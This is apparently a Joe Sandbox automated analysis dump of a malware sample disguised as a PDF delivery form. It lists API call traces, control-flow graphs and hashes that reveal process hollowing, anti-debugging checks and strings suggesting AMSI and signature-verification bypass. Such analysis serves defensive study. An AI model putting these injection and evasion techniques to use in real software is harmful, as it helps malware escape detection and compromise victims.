                                                                    • Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB
                                                                    • Part of subcall function 02CE85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668
                                                                  • GetThreadContext.KERNEL32(00000864,02D31420,ScanString,02D313A4,02CEA77C,UacInitialize,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,UacInitialize,02D313A4), ref: 02CE9442
                                                                    • Part of subcall function 02CE8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5
                                                                    • Part of subcall function 02CE84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529
                                                                    • Part of subcall function 02CE79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 4113022151-51457883
                                                                  • Opcode ID: df01125b45f6ff1cb4b2b53b91da4a1dd067802bf2bdfa426e15c41cd6b4e5b4
                                                                  • Instruction ID: 31c5ea388e98a564e8f27ab9a4036db0e11e56ae39f6c1a17e5f7ac95f1d4d9c
                                                                  • Opcode Fuzzy Hash: df01125b45f6ff1cb4b2b53b91da4a1dd067802bf2bdfa426e15c41cd6b4e5b4
                                                                  • Instruction Fuzzy Hash: CEE22A35A501189FDF25FBA4DD91BCE73BAEF88310F1141A1E24AAB214DA30EE46DF54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 8510 2cd5a78-2cd5ab9 GetModuleFileNameA RegOpenKeyExA 8511 2cd5afb-2cd5b3e call 2cd58b4 RegQueryValueExA 8510->8511 8512 2cd5abb-2cd5ad7 RegOpenKeyExA 8510->8512 8519 2cd5b40-2cd5b5c RegQueryValueExA 8511->8519 8520 2cd5b62-2cd5b7c RegCloseKey 8511->8520 8512->8511 8513 2cd5ad9-2cd5af5 RegOpenKeyExA 8512->8513 8513->8511 8515 2cd5b84-2cd5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8515 8517 2cd5c9e-2cd5ca5 8515->8517 8518 2cd5bbb-2cd5bbf 8515->8518 8523 2cd5bcb-2cd5be1 lstrlenA 8518->8523 8524 2cd5bc1-2cd5bc5 8518->8524 8519->8520 8521 2cd5b5e 8519->8521 8521->8520 8525 2cd5be4-2cd5be7 8523->8525 8524->8517 8524->8523 8526 2cd5be9-2cd5bf1 8525->8526 8527 2cd5bf3-2cd5bfb 8525->8527 8526->8527 8528 2cd5be3 8526->8528 8527->8517 8529 2cd5c01-2cd5c06 8527->8529 8528->8525 8530 2cd5c08-2cd5c2e lstrcpynA LoadLibraryExA 8529->8530 8531 2cd5c30-2cd5c32 8529->8531 8530->8531 8531->8517 8532 2cd5c34-2cd5c38 8531->8532 8532->8517 8533 2cd5c3a-2cd5c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8517 8534 2cd5c6c-2cd5c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8517
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5A94
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AB2
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AD0
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CD5AEE
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CD5B37
                                                                  • RegQueryValueExA.ADVAPI32(?,02CD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001), ref: 02CD5B55
                                                                  • RegCloseKey.ADVAPI32(?,02CD5B84,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CD5B77
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CD5B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CD5BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CD5BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CD5BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CD5C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CD5C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 326a4e30e5433b299426ee85f6cac17587f6cbbf1f4ce6555f7780b39e3e56d1
                                                                  • Instruction ID: 3a45322690d10d2934f232a810b8b1b3eeac63d9b9e5f623f0bc390f47d930f3
                                                                  • Opcode Fuzzy Hash: 326a4e30e5433b299426ee85f6cac17587f6cbbf1f4ce6555f7780b39e3e56d1
                                                                  • Instruction Fuzzy Hash: 3351B5B1A4024C7EFB25D6E4CC46FEF77BD9B48784F8405A1A704E6180EBB49B448FA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10477 2ce87a0-2ce87c5 LoadLibraryW 10478 2ce880f-2ce8815 10477->10478 10479 2ce87c7-2ce87df GetProcAddress 10477->10479 10480 2ce8804-2ce880a FreeLibrary 10479->10480 10481 2ce87e1-2ce8800 call 2ce7d00 10479->10481 10480->10478 10481->10480 10484 2ce8802 10481->10484 10484->10480
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A
                                                                    • Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                  • API String ID: 1002360270-4067648912
                                                                  • Opcode ID: e640d20c7df79d3250fed4276570bfd3bb1e2e0f2e610e62426ed4f2e308687f
                                                                  • Instruction ID: 30a5df2cd09ec3051090c81c3161115190b36a48e54c00a5e129c3b3f30697b2
                                                                  • Opcode Fuzzy Hash: e640d20c7df79d3250fed4276570bfd3bb1e2e0f2e610e62426ed4f2e308687f
                                                                  • Instruction Fuzzy Hash: 66F0AF71A802156EEF109A68F944BB6339CA780354F00092AF58DC7740C7709C54CB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10494 2ceebf0-2ceec0a GetModuleHandleW 10495 2ceec0c-2ceec1e GetProcAddress 10494->10495 10496 2ceec36-2ceec3e 10494->10496 10495->10496 10497 2ceec20-2ceec30 CheckRemoteDebuggerPresent 10495->10497 10497->10496 10498 2ceec32 10497->10498 10498->10496
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02CEEC00
                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CEEC12
                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CEEC29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                  • API String ID: 35162468-539270669
                                                                  • Opcode ID: 9e44b739081434541f47cfd71c43b64563a9275ac82a9d13008292a9d7237a5b
                                                                  • Instruction ID: 3831b39269fe67a5f797bc7d0753f6bc38d51599e8dab6d8ce77457106c81e40
                                                                  • Opcode Fuzzy Hash: 9e44b739081434541f47cfd71c43b64563a9275ac82a9d13008292a9d7237a5b
                                                                  • Instruction Fuzzy Hash: D1F0A07090468CAAEF22A7E898897DCFBAD6B05338F6803E4E426621C1E7750784C651

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDBEB
                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDC1B
                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CEDC30
                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CEDC5C
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CEDC65
                                                                    • Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                  • String ID:
                                                                  • API String ID: 2659941336-0
                                                                  • Opcode ID: dc8618206aabc65ef0d83255fb88cb27b3832fb0cdcbbf7c314455dd7d3b6d6c
                                                                  • Instruction ID: 3ff6f463093ce4084ba1dc81f0632f1139759ac76d90ca12d3cbe5f67bf1e637
                                                                  • Opcode Fuzzy Hash: dc8618206aabc65ef0d83255fb88cb27b3832fb0cdcbbf7c314455dd7d3b6d6c
                                                                  • Instruction Fuzzy Hash: FB210071A50708BAEB15EAE4CC46FDEB7BDAB48B00F500561B701F71C0DBB4AA449BA5

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CEE436
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: feeb0ae463ed5a783e767f6e2b9b292a201d3e0d21e09e4009a51ca2c4838134
                                                                  • Instruction ID: 629a72739ee0463670307eb70b616c5f7f2c018772cf9dde11a635a99df7d4fd
                                                                  • Opcode Fuzzy Hash: feeb0ae463ed5a783e767f6e2b9b292a201d3e0d21e09e4009a51ca2c4838134
                                                                  • Instruction Fuzzy Hash: E241F135A502089BEF24EBE4CD81ADE73FAEF4C360F114435E646B7250DA74AD069F64

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocCloseCreateStringWrite
                                                                  • String ID:
                                                                  • API String ID: 3308905243-0
                                                                  • Opcode ID: fd581705b5e84c5db3929f7c393db094522cb12367e04bfdbd54b104eb4af7dd
                                                                  • Instruction ID: f1156b05af507c2de4b8ba6dcd5eab5eaf2d319747c49f302a8674fe303095a6
                                                                  • Opcode Fuzzy Hash: fd581705b5e84c5db3929f7c393db094522cb12367e04bfdbd54b104eb4af7dd
                                                                  • Instruction Fuzzy Hash: BF21CA71E40308BAEB24EAE4CD46F9EB7BDAB44B04F604561B701F71D0D7B4AB049AA5

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                  • API String ID: 3130163322-2353454454
                                                                  • Opcode ID: 4d750e90e2d12ef2031d8b7cc36e67c582a6b027f5547807faa62f08778127c3
                                                                  • Instruction ID: 586fb3b488496aa72b9ed0a9b33400d1d4520a5552241becfa88845dc2a6c155
                                                                  • Opcode Fuzzy Hash: 4d750e90e2d12ef2031d8b7cc36e67c582a6b027f5547807faa62f08778127c3
                                                                  • Instruction Fuzzy Hash: 7011D3B5640208AFDB50DEA8DD41F9A37EDEB0C700F514624BA09E7650C634ED109B64
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: 84a923acbff155ca729148c55bd6811d24ad25b4008c9b9a64a90279b900dd59
                                                                  • Instruction ID: 09ba6e8c0fa371f9a06226423d39600fc6156796d9e4561f8c0b54dc3a5752a4
                                                                  • Opcode Fuzzy Hash: 84a923acbff155ca729148c55bd6811d24ad25b4008c9b9a64a90279b900dd59
                                                                  • Instruction Fuzzy Hash: B6112975640209AFEF14EFA4DC41EAEB7AEEB4C710F518874BA06D7640DA30EE15DB60
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: 6a6f979b1732c5d1ef093e49965bed6375298b8b18c76d7e2fcce49be83a6691
                                                                  • Instruction ID: 90eceebb13338434b2b2dfdd6c26a09ac3f7b79dce467a01766e6485e766685b
